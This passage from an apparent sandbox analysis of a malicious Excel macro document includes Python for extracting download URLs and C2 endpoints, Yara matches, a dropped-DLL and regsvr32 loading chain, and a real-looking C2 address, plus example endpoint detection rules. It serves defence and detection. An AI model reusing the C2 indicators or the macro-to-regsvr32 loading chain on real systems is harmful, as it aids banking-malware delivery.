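_HDR_RE = re.compile(rf"({_NAMES}): (.*?)(?=(?:{_NAMES}): |$)")
_REQ_RE = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01]")
# IP-literal URLs only; everything after the first "/" is ignored on purpose.
_IP_URL_RE = re.compile(r"(https?)://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?/")


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)


def parse_request_line(line):
    """Rebuild request line and headers from one flattened report line, or None."""
    m = _REQ_RE.search(line)
    if not m:
        return None
    headers = {name: value for name, value in _HDR_RE.findall(line[m.end():])}
    return Request(m.group(1), m.group(2), headers)


def payload_urls(lines):
    """Stage-two download URLs, one per request, in report order."""
    urls = []
    for line in lines:
        req = parse_request_line(line)
        if req and "Host" in req.headers:
            urls.append(f"http://{req.headers['Host']}{req.path}")
    return urls


def c2_endpoints(lines):
    """Distinct (ip, port) pairs from IP-literal URLs, trailing garbage dropped."""
    found = set()
    for line in lines:
        for scheme, ip, port in _IP_URL_RE.findall(line):
            found.add((ip, int(port) if port else (443 if scheme == "https" else 80)))
    return found


if __name__ == "__main__":
    for url in payload_urls(REPORT_LINES):
        print("download:", url)
    for ip, port in sorted(c2_endpoints(STRING_LINES)):
        print(f"c2: {ip}:{port}")
```

Blocking on the four download hosts is cheap but short-lived; the (ip, port) pairs from regsvr32.exe memory are the better network indicator because that is where the loaded DLL beacons, and the parser ignores everything after the first "/" precisely so the extractor's stray bytes cannot produce four "different" C2 URLs.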

E-Banking Fraud

Source: Yara match File source: 6.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1215258266.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.932327058.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.925354980.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1214677851.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.946842260.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1215228939.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1214643345.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1214621068.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.925541937.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
Source: Datei_26744565.xls Macro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx Jump to dropped file
Source: Datei_26744565.xls Initial sample: EXEC
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\RrQZitdNyvCFEhe\ Jump to behavior
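The drop-and-load chain recorded above (EXCEL.EXE writes uxevr1.ocx through uxevr4.ocx into C:\Users\user\, the macro sheet contains EXEC, regsvr32.exe then creates a randomly named directory under system32 and carries the https://165.22.73.229:8080/ C2 URL in memory) is what an endpoint detection should key on, because none of the individual binaries involved is malicious on its own. The Python below is an added example, not part of this report or of any vendor's rule set: it runs four rules over constructed Sysmon-style events modelled on this chain. The event schema is my own, the regsvr32 command lines are assumptions (the report does not print them), and the msiexec.exe event is a constructed benign control.

```python
from pathlib import PureWindowsPath

# Constructed events modelled on the chain in this report.  The command
# lines are assumptions; the report does not show them.  The last event is a
# benign control: an installer registering a control from Program Files.
EVENTS = [
    {"type": "file_create",
     "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "target": r"C:\Users\user\uxevr1.ocx"},
    {"type": "process_create",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "command_line": r'regsvr32.exe /S "C:\Users\user\uxevr1.ocx"'},
    {"type": "file_create",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "target": "C:\\Windows\\system32\\RrQZitdNyvCFEhe\\"},
    {"type": "network_connect",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "dest_ip": "165.22.73.229", "dest_port": 8080},
    {"type": "process_create",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r'regsvr32.exe /s "C:\Program Files\Vendor\ctl.ocx"'},
]

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
LIBRARY_EXT = {".ocx", ".dll"}


def _name(path):
    """Lower-cased file name of a Windows path, OS-independent."""
    return PureWindowsPath(path).name.lower()


def _in_user_root(path):
    """True for C:\\Users\\<name>\\<file>, i.e. directly in a profile root."""
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    return len(parts) == 4 and parts[1] == "users"


def detect(events):
    """Return (rule_name, detail) for every event that matches a rule."""
    alerts = []
    for e in events:
        img = _name(e["image"])
        if (e["type"] == "file_create" and img in OFFICE_IMAGES
                and PureWindowsPath(e["target"]).suffix.lower() in LIBRARY_EXT
                and _in_user_root(e["target"])):
            # "Drops PE files to the user root directory" from this report
            alerts.append(("office_drops_library_in_user_root", e["target"]))
        elif e["type"] == "process_create" and img == "regsvr32.exe":
            parent = _name(e["parent_image"])
            cl = e["command_line"].lower()
            if parent in OFFICE_IMAGES:
                # Office has no business registering COM servers
                alerts.append(("office_spawns_regsvr32", e["command_line"]))
            elif "\\users\\" in cl and any(ext in cl for ext in LIBRARY_EXT):
                # weaker rule for when the parent is not visible
                alerts.append(("regsvr32_loads_library_from_user_profile", e["command_line"]))
        elif (e["type"] == "file_create" and img == "regsvr32.exe"
              and e["target"].lower().startswith("c:\\windows\\system32\\")):
            # the random subdirectory under system32 is where the DLL is copied
            alerts.append(("regsvr32_writes_to_system32", e["target"]))
        elif e["type"] == "network_connect" and img == "regsvr32.exe":
            alerts.append(("regsvr32_outbound_connection",
                           f'{e["dest_ip"]}:{e["dest_port"]}'))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule}: {detail}")
```

Two of these rules (Office spawning regsvr32.exe, regsvr32.exe opening a socket) are noisy enough on their own to be tuned per environment; the value is in correlating them by process id within a short window, which is exactly the sequence this report's signatures reconstruct.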
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D212B0 3_2_000007FEF9D212B0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D25E01 3_2_000007FEF9D25E01
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D25CAD 3_2_000007FEF9D25CAD
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D26850 3_2_000007FEF9D26850
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D2443C 3_2_000007FEF9D2443C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D253FB 3_2_000007FEF9D253FB
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D24A70 3_2_000007FEF9D24A70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_002C0000 3_2_002C0000
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026410 3_2_0000000180026410
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025C30 3_2_0000000180025C30
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001D58 3_2_0000000180001D58
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800165E4 3_2_00000001800165E4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180011E5C 3_2_0000000180011E5C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002C6C8 3_2_000000018002C6C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002C2C8 3_2_000000018002C2C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026F14 3_2_0000000180026F14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180016320 3_2_0000000180016320
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001378 3_2_0000000180001378
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180018FE8 3_2_0000000180018FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001ABE8 3_2_000000018001ABE8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800243F4 3_2_00000001800243F4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800083F8 3_2_00000001800083F8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800247FC 3_2_00000001800247FC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001DBFC 3_2_000000018001DBFC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001100C 3_2_000000018001100C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180027C28 3_2_0000000180027C28
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002143C 3_2_000000018002143C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001303C 3_2_000000018001303C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002A840 3_2_000000018002A840
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003840 3_2_0000000180003840
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B444 3_2_000000018000B444
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F048 3_2_000000018000F048
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002AC4C 3_2_000000018002AC4C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010050 3_2_0000000180010050
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003050 3_2_0000000180003050
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000445C 3_2_000000018000445C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000C85C 3_2_000000018000C85C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003460 3_2_0000000180003460
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029C6C 3_2_0000000180029C6C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001586C 3_2_000000018001586C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000406C 3_2_000000018000406C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E06C 3_2_000000018000E06C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000BC70 3_2_000000018000BC70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001447C 3_2_000000018001447C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026C80 3_2_0000000180026C80
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010C84 3_2_0000000180010C84
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180016088 3_2_0000000180016088
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180002888 3_2_0000000180002888
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180017C8C 3_2_0000000180017C8C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000FC8C 3_2_000000018000FC8C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002D098 3_2_000000018002D098
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800154B8 3_2_00000001800154B8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180011CCC 3_2_0000000180011CCC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800064D0 3_2_00000001800064D0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800180D4 3_2_00000001800180D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800054D8 3_2_00000001800054D8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002CCE0 3_2_000000018002CCE0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800254E4 3_2_00000001800254E4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800184E8 3_2_00000001800184E8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800010E8 3_2_00000001800010E8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E8F0 3_2_000000018000E8F0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002A0F8 3_2_000000018002A0F8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180019900 3_2_0000000180019900
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180011904 3_2_0000000180011904
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001F908 3_2_000000018001F908
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002490C 3_2_000000018002490C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001890C 3_2_000000018001890C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001D510 3_2_000000018001D510
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180003D18 3_2_0000000180003D18
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002191C 3_2_000000018002191C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001D128 3_2_000000018001D128
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D12C 3_2_000000018000D12C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014930 3_2_0000000180014930
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008534 3_2_0000000180008534
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001CD44 3_2_000000018001CD44
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B948 3_2_000000018000B948
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000796C 3_2_000000018000796C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010590 3_2_0000000180010590
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180028D94 3_2_0000000180028D94
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800091A8 3_2_00000001800091A8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800171B8 3_2_00000001800171B8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180018DBC 3_2_0000000180018DBC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800141C8 3_2_00000001800141C8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002B1D4 3_2_000000018002B1D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023DDC 3_2_0000000180023DDC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029DF0 3_2_0000000180029DF0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180015DF4 3_2_0000000180015DF4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800011F4 3_2_00000001800011F4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000FE08 3_2_000000018000FE08
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180027E14 3_2_0000000180027E14
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000B618 3_2_000000018000B618
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023220 3_2_0000000180023220
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180020A34 3_2_0000000180020A34
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180007634 3_2_0000000180007634
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180022E38 3_2_0000000180022E38
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E638 3_2_000000018000E638
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180010250 3_2_0000000180010250
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180026A64 3_2_0000000180026A64
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180004264 3_2_0000000180004264
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180013674 3_2_0000000180013674
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F678 3_2_000000018000F678
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E278 3_2_000000018000E278
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180005E7C 3_2_0000000180005E7C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025E88 3_2_0000000180025E88
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002868C 3_2_000000018002868C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014E98 3_2_0000000180014E98
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180014AA4 3_2_0000000180014AA4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800126A8 3_2_00000001800126A8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800036A8 3_2_00000001800036A8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002A6BC 3_2_000000018002A6BC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001CABC 3_2_000000018001CABC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000EAC0 3_2_000000018000EAC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001B6D4 3_2_000000018001B6D4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000F2DC 3_2_000000018000F2DC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800202E0 3_2_00000001800202E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800226E0 3_2_00000001800226E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180019AF0 3_2_0000000180019AF0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000BEF0 3_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180012EF8 3_2_0000000180012EF8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029710 3_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180017710 3_2_0000000180017710
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000C740 3_2_000000018000C740
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180020F44 3_2_0000000180020F44
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023B48 3_2_0000000180023B48
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180023748 3_2_0000000180023748
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180021754 3_2_0000000180021754
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180022358 3_2_0000000180022358
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180029F5C 3_2_0000000180029F5C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018002B368 3_2_000000018002B368
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001BF70 3_2_000000018001BF70
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180025374 3_2_0000000180025374
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180007F74 3_2_0000000180007F74
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180021F7C 3_2_0000000180021F7C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180019788 3_2_0000000180019788
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180001B8C 3_2_0000000180001B8C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180028394 3_2_0000000180028394
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180013B94 3_2_0000000180013B94
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001479C 3_2_000000018001479C
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000E7A0 3_2_000000018000E7A0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800087A4 3_2_00000001800087A4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180017BA8 3_2_0000000180017BA8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000EBAC 3_2_000000018000EBAC
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018001B3B8 3_2_000000018001B3B8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180012BB8 3_2_0000000180012BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800257C0 3_2_00000001800257C0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180008BC0 3_2_0000000180008BC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800117C4 3_2_00000001800117C4
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00000001800227E0 3_2_00000001800227E0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_003B0000 4_2_003B0000
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800083F8 4_2_00000001800083F8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180026410 4_2_0000000180026410
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000680F 4_2_000000018000680F
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180025C30 4_2_0000000180025C30
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180013674 4_2_0000000180013674
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180017C8C 4_2_0000000180017C8C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000A48C 4_2_000000018000A48C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180011CCC 4_2_0000000180011CCC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 4_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180029710 4_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180026F14 4_2_0000000180026F14
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180023748 4_2_0000000180023748
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180001D58 4_2_0000000180001D58
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002B368 4_2_000000018002B368
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180001378 4_2_0000000180001378
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180010590 4_2_0000000180010590
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800091A8 4_2_00000001800091A8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800165E4 4_2_00000001800165E4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180018FE8 4_2_0000000180018FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001ABE8 4_2_000000018001ABE8
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180029DF0 4_2_0000000180029DF0
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800243F4 4_2_00000001800243F4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180015DF4 4_2_0000000180015DF4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800011F4 4_2_00000001800011F4
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800247FC 4_2_00000001800247FC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001DBFC 4_2_000000018001DBFC
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000FE08 4_2_000000018000FE08
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001100C 4_2_000000018001100C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180027E14 4_2_0000000180027E14
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000B618 4_2_000000018000B618
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180023220 4_2_0000000180023220
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180027C28 4_2_0000000180027C28
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180020A34 4_2_0000000180020A34
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180007634 4_2_0000000180007634
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180022E38 4_2_0000000180022E38
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000E638 4_2_000000018000E638
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002143C 4_2_000000018002143C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018001303C 4_2_000000018001303C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002A840 4_2_000000018002A840
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180003840 4_2_0000000180003840
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000B444 4_2_000000018000B444
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000F048 4_2_000000018000F048
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018002AC4C 4_2_000000018002AC4C
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180010050 4_2_0000000180010050
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180010250 4_2_0000000180010250
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180003050 4_2_0000000180003050
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180011E5C 4_2_0000000180011E5C
